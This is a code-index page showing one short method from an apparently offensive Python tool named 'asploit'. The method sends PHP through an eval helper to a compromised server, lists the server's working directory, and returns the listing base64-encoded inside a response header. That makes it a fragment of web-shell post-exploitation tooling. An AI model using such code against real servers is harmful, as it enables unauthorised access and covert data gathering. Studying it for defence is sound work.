MCPcopy Create free account
hub / github.com/Geeoon/asploit / _Base__ls

Method _Base__ls

src/PHPExploitProcessor.py:143–147  ·  view source on GitHub ↗
(self, options: str)

Source from the content-addressed store, hash-verified

141 @brief See base class for details.
142 """
143 def _Base__ls(self, options: str):
144 out = self.__eval(
145 f"header('{self.header}: ' . "
146 f"base64_encode(implode(' ', scandir(getcwd()))));")
147 print(base64.b64decode(out).decode())
148
149 """
150 @brief See base class for details.

Callers

nothing calls this directly

Calls 1

__evalMethod · 0.95

Tested by

no test coverage detected